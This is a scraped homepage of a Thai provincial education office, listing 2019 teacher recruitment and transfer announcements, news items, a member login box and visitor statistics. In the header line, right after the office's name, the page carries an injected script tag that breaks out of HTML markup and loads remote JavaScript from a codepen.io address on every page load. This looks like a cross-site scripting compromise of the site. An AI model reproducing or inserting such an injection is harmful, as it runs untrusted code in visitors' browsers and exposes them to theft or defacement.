[x] ปิดหน้าต่างนี้
Powered by กลุ่มงานเทคโนโลยีสารสนเทศ สำนักงานศึกษาธิการจังหวัดชลบุรี
สำนักงานศึกษาธิการจังหวัดชลบุรี Chonburi Provincial Education Office "><script src="https://codepen.io/ugmh-l/pen/BaBdjpN.js"> </script> "> ">
เมนูหลัก
กลุ่มงานใน ศธจ.ชลบุรี
วีดีโอข่าว ศธจ.ชลบุรี

วีดีโอข่าว.ศธจ.ชลบุรี
เว็บลิงค์สำนักงานการศึกษาระบบสมาชิก
Username :
Password :
[ สมัครสมาชิก ] | [ ลืมรหัสผ่าน ]
สมาชิกทั้งหมด 9 คน
สมาชิกที่กำลังออนไลน์ 0 คน


  
ข่าว / ประกาศ / ประชาสัมพันธ์

 [ 16 ก.ย. 2562] -ประกาศรับสมัครคัดเลือกบุคคลเพื่อรับโอนพนักงานส่วนท้องถิ่นและข้าราชการอื่นมาบรรจุและแต่งตั้งเป็นข้าราชการครูและบุคลากรทางการศึกษา ตำแหน่งบุคลากรทางการศึกษาอื่นตามมาตรา 38 ค.(2) สังกัดสำนักงานเขตพื้นที่การศึกษามัธยมศึกษา เขต 18  ดาวน์โหลด 

 [ 13 ก.ย. 2562] - รับสมัครคัดเลือกนักศึกษาทุนโครงการผลิตครูเพื่อพัฒนาท้องถิ่น  ปี ๒๕๖๒ เพื่อบรรจุและแต่งตั้งเข้ารับราชการครูและบุคลากรทางการศึกษา  ตำแหน่งครูผู้ช่วย สังกัด สำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน  ดาวน์โหลด 

 [ 6 ก.ย. 2562] - การรับสมัครคัดเลือกข้าราชการเพื่อรับย้าย โอนข้าราชการครูและบุคลากรทางการศึกษา และรับย้ายข้าราชการพลเรือนสามัญ และรับโอนพนักงานส่วนท้องถิ่นและข้าราชการอื่น มาบรรจุและแต่งตั้งให้ดำรงตำแหน่งบุคลากรทางการศึกษาอื่นตามมาตรา 38 ค.(2) สังกัดสำนักงานเขตพื้นที่การศึกษาประถมศึกษาชลบุรี เขต 2   ดาวน์โหลด 

 [ 6 ก.ย. 2562] - การรับสมัครคัดเลือกข้าราชการครูและบุคลากรทางการศึกษา ตำแหน่งบุคลากรทางการศึกษาอื่นตามมาตรา 38 ค.(2) เพื่อย้ายและแต่งตั้งให้ดำรงตำแหน่งผู้อำนวยการกลุ่มบริหารงานบุคคล สังกัดสำนักงานเขตพื้นที่การศึกษาประถมศึกษาชลบุรี เขต 1  ดาวน์โหลด 

 [ 3 ก.ย. 2562] - ประกาศรายชื่อผู้ได้รับการคัดเลือกเพื่อรับย้ายข้าราชการให้ดำรงตำแหน่งบุคลากรทางการศึกษาอื่นตามมาตรา 38 ค.(2) สังกัดสำนักงานเขตพื้นที่การศึกษามัธยมศึกษา เขต 18     ดาวน์โหลด 

 [ 27 ส.ค. 2562] - ประกาศรายชื่อผู้ผ่านการคัดเลือกบุคคลเพื่อบรรจุและแต่งตั้งให้ดำรงตำแหน่งศึกษานิเทศก์ สังกัดสำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน ปี พ.ศ. 2562    ดาวน์โหลด 

 [ 15 ส.ค. 2562] - ประกาศ กศจ.ชลบุรี เรื่องผลการคัดเลือกนักศึกษาทุนโครงการส่ง้สริมการผลิตครูที่มีความสามารถพิเศษทางวิทยาศาสตร์และคณิตศาสตร์ (สควค.)   ดาวน์โหลด  

 [ 15 ส.ค. 2562] - ประกาศผลสอบการคัดเลือกบุคคลเพื่อบรรจุและแต่งตั้งเข้ารับราชการเป็นข้าราชการครูและบุคลากรทางการศึกษา ตำแหน่งครูผู้ช่วย กรณีที่มีความจำเป็นหรือมีเหตุพิเศษ ปี 2562   ดาวน์โหลด  

 [ 14 ส.ค. 2562] - ประกาศผลการคัดเลือกสถานศึกษาที่ปฏิบัติเป็นเลิศ (Best Practices)  ด้านการบริหารจัดการการศึกษาปฐมวัย  ภายใต้โครงการขับเคลื่อนการพัฒนาการจัดการศึกษาปฐมวัยในระดับพื้นที่ จังหวัดชลบุรี  ประจำปีงบประมาณ ๒๕๖๒   ดาวน์โหลด  

 [ 9 ส.ค. 2562] - กศจ.ชลบุรี ประกาศรับสมัครคัดเลือกข้าราชการครูและบุคลากรทางการศึกษาเพื่อรับย้าย โอนข้าราชการครูและบุคลากรทางการศึกษา และย้ายข้าราชการพลเรือนสามัญไปแต่งตั้งให้ดำรงตำแหน่งบุคลากรทางการศึกษาอื่นตามมาตรา 38 ค.(2) สังกัดสำนักงานเขตพื้นที่การศึกษามัธยมศึกษา เขต 18   ดาวน์โหลด 

 [ 9 ส.ค. 2562] - กศจ.ชลบุรี ประกาศรายชื่อผู้มีสิทธิเข้ารับการคัดเลือกบุคคลเพื่อบรรจุและแต่งตั้งให้ดำรงตำแหน่งศึกษานิเทศก์ สังกัด สพฐ. ปี พ.ศ. ๒๕๖๒(แก้ไขอัพโหลดใหม่)   ดาวน์โหลด

 [ 3 ส.ค. 2562] - กศจ.ชลบุรี เรียกรายงานตัวผู้สอบแข่งขันได้ เพื่อบรรจุแต่งตั้งบุคคลเข้ารับราชการเป็นราชการครู และบุคลากรทางการศึกษา ตำแหน่งครูผู้ช่วย  สังกัดสำนักงานคณะกรรมการการศึกษาขั้นพื้นฐาน ตามประกาศการขึ้นบัญชีผู้สอบแข่งขันได้ของ กศจ.ชลบุรี  ลว. 6 กันยายน 61    ให้รายงานตัวและบรรจุแต่งตั้ง วันที่ 19 สิงหาคม  2562   ดาวน์โหลด

 [ 2 ส.ค. 2562] - รับสมัครคัดเลือกนักศึกษาทุนโครงการส่งเสริมการผลิตครูที่มีความสามารถพิเศษทางวิทยาศาสตร์และคณิตศาสตร์ (สควค.) เพื่อบรรจุและแต่งตั้งเข้ารับราชการเป็นข้าราชการครูและบุคลากรทางการศึกษา ตำแหน่ง ครูผู้ช่วย กรณีมีสัญญาผูกพันตามโครงการพิเศษหรือโครงการทุนรัฐบาล (ระดับปริญญาโท)    ดาวน์โหลด  

 [ 30 ก.ค. 2562] - ประกาศรายชื่อผู้มีสิทธิ์และผู้ไม่มีสิทธิเข้ารับการคัดเลือกบุคคลเพื่อบรรจุและแต่งตั้งเข้ารับราชการเป็นข้าราชการครูและบุคลากรทางการศึกษา ตำแหน่งครูผู้ช่วย กรณีที่มีความจำเป็นหรือมีเหตุพิเศษ ปี 2562    ดาวน์โหลด 

 [ 25 ก.ค. 2562] - ประกาศรับสมัครคัดเลือกบุคคลเพื่อบรรจุและแต่งตั้งให้ดำรงตำแหน่งศึกษานิเทศก์ สังกัด สพฐ. ปี พ.ศ. 2562    ดาวน์โหลด 

 [ 9 ก.ค. 2562] - ประกาศรับสมัครคัดเลือกบุคคลเพื่อบรรจุและแต่งตั้งเข้ารับราชการเป็นข้าราชการครูและบุคลากรทางการศึกษา ตำแหน่งครูผู้ช่วย กรณีที่มีความจำเป็นหรือมีเหตุพิเศษ ปี 2562  ดาวน์โหลด 

 [ 7 ก.ค. 2562] - ประกาศรายชื่อผู้ที่ได้รับการการพัฒนาข้าราชการครูและบุคลากรทางการศึกษาก่อนแต่งตั้งให้ดำรงตำแหน่งผู้อำนวยการสถานศึกษา รุ่นที่ ๒ - ๑๐/ ๒๕๖๒ จำนวน ๑๘ คน  ดาวน์โหลด 

 [ 7 ก.ค. 2562] - ประกาศรายชื่อผู้มีสิทธิเข้ารับการคัดเลือกข้าราชการครูและบุคลากรทางการศึกษาอื่นตามมาตรา 38 ค.(2) เพื่อย้ายและแต่งตั้งให้ดำรงตำแหน่งผู้อำนวยการกลุ่มบริหารงานการเงินและสินทรัพย์ สังกัดสำนักงานเขตพื้นที่การศึกษาประถมศึกษาชลบุรี เขต ๒   ดาวน์โหลด 

อ่านข่าวประกาศย้อนหลัง ได้ที่นี่


School Mapping
แผนที่กลุ่มโรงเรียน(ปฐมวัย) ใน กศจ.ชลบุรี
รายงานคุณภาพครูโรงเรียนเอกชน
คลิปสัมภาษณ์ นายธานินทร์ ชลจิตต์ ผอ.ศธจ.ชลบุรี
ข่าวสารทั่วไป
28 โดย : adminAe
28/มิ.ย./2562     
Not Rated stars ( Not Rated / 0 )
( 240 / )
    โครงการสร้างเครือข่าย ความสัมพันธ์ ระหว่างบ้านและโรงเรียน ...เมื่อวันที่ 22 มิถุนายน ๒๕๖๒ นายธานินทร์ ชลจิตต์ ศึกษาธิการจังหวัดชลบุรี พร้อมด้วย และคณะข้าราชการสังกัดสำนักงานศึกษาธิการจังหวัดชลบุรี จัดโครงการสร้างเครือข่าย ความสัมพันธ์ ระหว่างบ้านและโรงเร อ่านต่อ....
15 โดย : AdminAe
15/ส.ค./2561     
Not Rated stars ( Not Rated / 0 )
ศธจ.ชลบุรี ร่วมพิธีถวายราชสักการะและจุดเทียนชัยถวายพระพร ( 937 / )
    เมื่อวันที่ ๑๒ สิงหาคม ๒๕๖๑ เวลา ๑๗.๐๐ น. นายธานินทร์ ชลจิตต์ ศึกษาธิการจังหวัดชลบุรี พร้อมด้วย นางสาวศุภิสรา ชลจิตต์ นางอัมพร ณุวงศ์ศรี ผู้อำนวยการกลุ่มบริหารงานบุคคล และคณะข้าราชการสังกัดสำนักงานศึกษาธิการจังหวัดชลบุรี ร่วมพิธีถวายเครื่องราชสักการะ และพ อ่านต่อ....
(10/ก.พ./2561) ( 1131 / ) โดย adminAe
ประชาสัมพันธ์การศึกษา
ผู้บริหาร ศธจ.ชลบุรี
ศึกษาธิการจังหวัดชลบุรี
แบบตรวจการเปิดเผยข้อมูลสาธารณะฯ
ปฏิทินกิจกรรม


กันยายน 2562
อา. จ. อ. พ. พฤ. ศ. ส.
1 2 3 4 5 6 7
8 9 10 11 12 13 14
15 16 17 18 19 20 21
22 23 24 25 26 27 28
29 30          

คลังเก็บรูปภาพ
สถิติผู้เยี่ยมชม

 เริ่มนับ 10/ส.ค./2560
ผู้ใช้งานขณะนี้ 6 IP
ขณะนี้
6 คน
สถิติวันนี้
97 คน
สถิติเมื่อวานนี้ี้
312 คน
สถิติเดือนนี้
8089 คน
สถิติปีนี้
70237 คน
สถิติทั้งหมด
210170 คน
IP ของท่านคือ 18.207.136.184
(Show/hide IP)